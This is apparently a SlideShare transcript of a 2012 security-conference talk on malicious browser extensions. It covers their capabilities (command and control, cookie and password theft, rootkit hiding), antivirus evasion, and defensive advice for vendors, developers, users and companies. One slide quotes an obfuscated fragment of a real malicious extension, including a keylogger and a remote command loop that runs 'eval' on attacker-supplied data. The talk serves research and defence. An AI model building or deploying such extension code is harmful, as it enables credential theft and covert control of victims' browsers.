Hacktivityonly 121013141039-phpapp02

661 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
661
On SlideShare
0
From Embeds
0
Number of Embeds
314
Actions
Shares
0
Downloads
2
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Hacktivityonly 121013141039-phpapp02

  1. 1. IntroductionZoltán BalázsITSEC consultantDeloitte HungaryOSCP, CISSP, C|HFI, CPTS, MCPhttp://www.slideshare.net/bz98Cyberlympics finals Member of the gula.sh team
  2. 2. I love Hacking
  3. 3. I love Zombie movies
  4. 4. I love LOLcats
  5. 5. Zombies + Hacking + LOLcats = I R ZOMBIE BROWSER
  6. 6. Zombie browsers, spiced with rootkit extensions Hacktivity 2012• Legal disclaimer:• Every point of views and thoughts are mine.• The next presentation’s contents do not have any connection with my employers opinion, whether past, present or future.• What you will hear can be only used in test labs, and only for the good.
  7. 7. About:presentation• History of malicious extensions (add-on, plug-in, extension, BHO)• Focus on Firefox, Chrome, Safari• Advantages – disadvantages• Browser extension rootkits• Live demo – home made extension
  8. 8. History of malicious Firefox extensions• 90% of malicious extensions were created for Facebook spamming• 2004-2010: 5• 2011: 5• Jan 01, 2012 – Oct 06, 2012: 48* *Data from mozilla.org
  9. 9. More examples on FacecrookText ©f-secure
  10. 10. My zombie extension• Command and Control• Stealing cookies, passwords• Uploading/downloading files (Firefox, Chrome NPAPI on todo list)• Binary execution (Firefox - Windows, Chrome NPAPI on todo list)• Geolocation
  11. 11. Safari demo
  12. 12. Installing the extension Physical access Social EngineeringRemote code execution – without user interaction
  13. 13. Firefox rootkit 1• Hook into other extension (even signed ones)
  14. 14. Firefox rootkit 2• visible = false
  15. 15. Firefox rootkit 3• seen in the wild
  16. 16. Quick Quiz - for Hacker Pschorr
  17. 17. Quick Quiz• Which company developed the first Netscape plugin?• *****
  18. 18. Quick Quiz• Which company developed the first Netscape plugin?• A***e
  19. 19. Quick Quiz• Which company developed the first Netscape plugin?• Adobe in 1995
  20. 20. Risks of a Zombie Browser• Eats your brain while you are asleep
  21. 21. Risks of a Zombie Browser
  22. 22. Risks of a Zombie Browser• Firewall/proxy • Local firewall • Application whitelisting • Web-filtering 
  23. 23. Risks of a Zombie Browser• Cross-platform • Cross-domain Universal XSS • Every secret is available  • Password input method does not matter (password safe, virtual keyboard, etc.) • Before SSL (+JS obfuscation)• Malicious source codes are available • Advantage against meterpreter  • exe/dll is not needed for persistence • Writing into registry is not needed
  24. 24. Risks of a zombie browser• Low AV signature based detection rate • Sample from January 2011. – October 2012. 0/44• Extension vs. behavioral based detection 
  25. 25. Risks of a zombie browser• Low AV signature based detection rate • Sample from January 2011. – October 2012. 0/44• Extension vs. behavioral based detection 
  26. 26. Friendly message to AV developers: try harder…Code snippets from undetected malicious browser extensionvar_0x39fe=["x73x63x72x69x70x74","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x74x79x70x65","x74x65x78x74…_0xaed4=[_0x39fe[0],_0x39fe[1],_0x39fe[2],_0x39fe[3],_0x39fe[4],_0x39fe[5],_0x39fe[6],_0x39fe[7],_0x39fe[8],_0x39fe[9]];keylogger_namespace.keylogger…for(var x in mothership){if (mothership[x].command == "eval"){eval(mothership[x].data);
  27. 27. Profit ...
  28. 28. Firefox
  29. 29. Disadvantages (for the Hacker)• Not a real rootkit• Browser limitations (eg. portscan)• Platform limitations (eg. Execute binary code only on Windows)• Runs in user space• Runs only when browser is open• Extensions are not yet supported in: • Chrome on Android/iOS • Safari on iOS
  30. 30. Chrome - rootkit
  31. 31. Chrome - distributedpassword hash cracking• Idea and coding by my friend and colleague, WoFF• Password hash cracking performance • Javascript: 82,000 hash/sec • Chrome native client: 840,000 hash/sec • Native code (john): 11,400,000 hash/sec
  32. 32. ChromeOSDEMO
  33. 33. ChromeOSDEMONot today :-(no extension install from 3rdparty siteno Flash, no Java, no NPAPI
  34. 34. ChromeOSDEMONot today :-(no extension install from 3rdparty siteno Flash, no Java, no NPAPI
  35. 35. Firefox webcam
  36. 36. Browser extensions might be bad• @antivirus developers • Be reactive • The browser is the new OS• @browser developers (Mozilla) • Default deny installing extensions from 3rd-party sites • Chrome-level security • Require permissions • Extension components – separate privileges• @browser developers (Google) – keep on the good job • but disable NPAPI :)
  37. 37. Browser extensions might be bad• @website developers • There is no prevention against password stealing • Cookie-stealing • Restrict session to IP (by default)• @users • Beware of malicious browser extensions • Use separated OS for e-banking and other sensitive stuff • Removing - create new clean profile in clean OS• @companies • Control which browsers users can use • Restrict extensions via GPO
  38. 38. Browser extensions might be bad, Mmmkay??? zbalazs@deloittece.com zbalazs4 hu.linkedin.com/in/zbalazs Code will be released under GPL in 2012 Greetz to @hekkcamp
  39. 39. References• Grégoire Gentil: Hack any website, 2003• Christophe Devaux, Julien Lenoir: Browser rootkits, 2008• Duarte Silva: Firefox FFSpy PoC, 2008• Andreas Grech: Stealing login details with a Google Chrome extension, 2010• Matt Johansen, Kyle Osborn: Hacking Google ChromeOS, 2011• Nicolas Paglieri: Attacking Web Browsers, 2012

×